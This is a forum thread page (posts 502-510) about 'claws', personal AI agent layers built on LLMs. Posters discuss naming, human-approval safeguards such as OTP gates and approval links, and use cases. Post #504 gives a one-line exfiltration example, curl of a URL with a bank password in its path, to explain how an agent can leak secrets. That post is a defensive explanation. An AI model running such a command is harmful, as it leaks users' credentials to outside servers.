The challenge with layering on top of LLM agents is payment — agents need to call external tools and services, but most APIs still require accounts and API keys that agents can't manage. The x402 standard (HTTP 402 + EIP-712 USDC signatures) solves this cleanly: agent holds a wallet, signs a micropayment per call, no account needed. Worth considering as a primitive for agent-to-agent commerce in these architectures.
Claws are now a new layer on top of LLM agents
501–510 of 1001 posts
Re: Claws are now a new layer on top of LLM agents
#502It implies an ubiquity that just isn't there (yet) so it feels unearned and premature in my mind. It seems better for social media narratives more than anything.
I'll admit I don't hate the term claws I just think it's early. Like Bandaid had much more perfusion and mindshare before it became a general term for anything as an example.
I also think this then has an unintended chilling effect in innovation because people get warned off if they think a space is closed to taking different shapes.
At the end of the day I don't think we've begun to see what shapes all of this stuff will take. I do kind of get a point of having a way to talk about it as it's shaping though. Idk things do be hard and rapidly changing.
Re: Claws are now a new layer on top of LLM agents
#503Earlier quoted context omitted.
How do you enforce this? You have a system where the agent can email people, but cannot email "too many people" without a password?
It's not a perfect security model. Between the friction and all caps instructions the model sees, it's a balance between risk and simplicity, or maybe risk and sanity. There's ways I can imagine the concept can be hardened, e.g. with a server layer in between that checks for things like dangerous actions or enforces rate limiting
Re: Claws are now a new layer on top of LLM agents
#504Earlier quoted context omitted.
No. I was trying to explain that providing web access shouldn't be tantamount to handing over the keys. You should be able to use sites and apps through a limited service account, but this requires them to be built with agents and authorization in mind. REST APIs often exist but are usually written with developers in mind. If agents are going to go maintstream, these APIs need to be more user friendly.
That's not what the parent comment was saying. They are pointing out that you can exfiltrate secret information by querying any web page with that secret information in the path. `curl www.google.com/my-bank-password`. Now, google logs have my bank password in them.
Re: Claws are now a new layer on top of LLM agents
#505Can't we rename "Claws" -> "Personal assistants"? OpenClaw is a stupid name. Even "OpenSlave" would be a better fit.
How about "Open Assistants"? "OpenAss" for short?
One of the contemporaneous competitors to jQuery was called "DOMAss".
https://robertnyman.com/2007/03/02/domass-renamed-to-domassi...
Re: Claws are now a new layer on top of LLM agents
#506One safety pattern I’m baking into CLI tools meant for agents: anytime an agent could do something very bad, like email blast too many people, CLI tools now require a one-time password The tool tells the agent to ask the user for it, and the agent cannot proceed without it. The instructions from the tool show an all caps message explaining the risk and telling the agent that they must prompt the user for the OTP I ha…
I've created my own "claw" running in fly.io with a pattern that seems to work well. I have MCP tools for actions that I want to ensure human-in-the loop - email sending, slack message sending, etc. I call these "activities". The only way for my claw to execute these commands is to create an activity which generates a link with the summary of the acitvity for me to approve.
Re: Claws are now a new layer on top of LLM agents
#507The real big deal about 'claws' in that they're agents oriented around the user. The kind of AI everyone hates is the stuff that is built into products. This is AI representing the company. It's a foreign invader in your space. Claws are owned by you and are custom to you. You even name them. It's the difference between R2D2 and a robot clone trying to sell you shit. (I'm aware that the llms themselves aren't local b…
Re: Claws are now a new layer on top of LLM agents
#508Earlier quoted context omitted.
There are a few qualitative product experiences that make claw agents unique. One is that it relentlessly strives thoroughly to complete tasks without asking you to micromanage it. The second is that it has personality. The third is that it's artfully constructed so that it feels like it has infinite context. The above may sound purely circumstantial and frivolous. But together it's the first agent that many people w…
Can you give some example for what you use it for? I understand giving a summary of what's waiting in your inbox but what else?
For example, finding an available plumber. Currently involves Googling and then calling them one by one. Usually takes 15-20 calls before I can find one that has availability.
Re: Claws are now a new layer on top of LLM agents
#509Re: Claws are now a new layer on top of LLM agents
#510Earlier quoted context omitted.
Going from ten finger typing to thumb only or voice has never panned out for me. Any tips?
I always want to know what the hell it is these people claim to be working on lmao. But seems like this guy is the real deal based on his post history
I always try to not use my phone when out and about, preferring to chat people up so we don't lose our IRL social skills. They are more interesting than whatever my phone might have to offer me in those moments.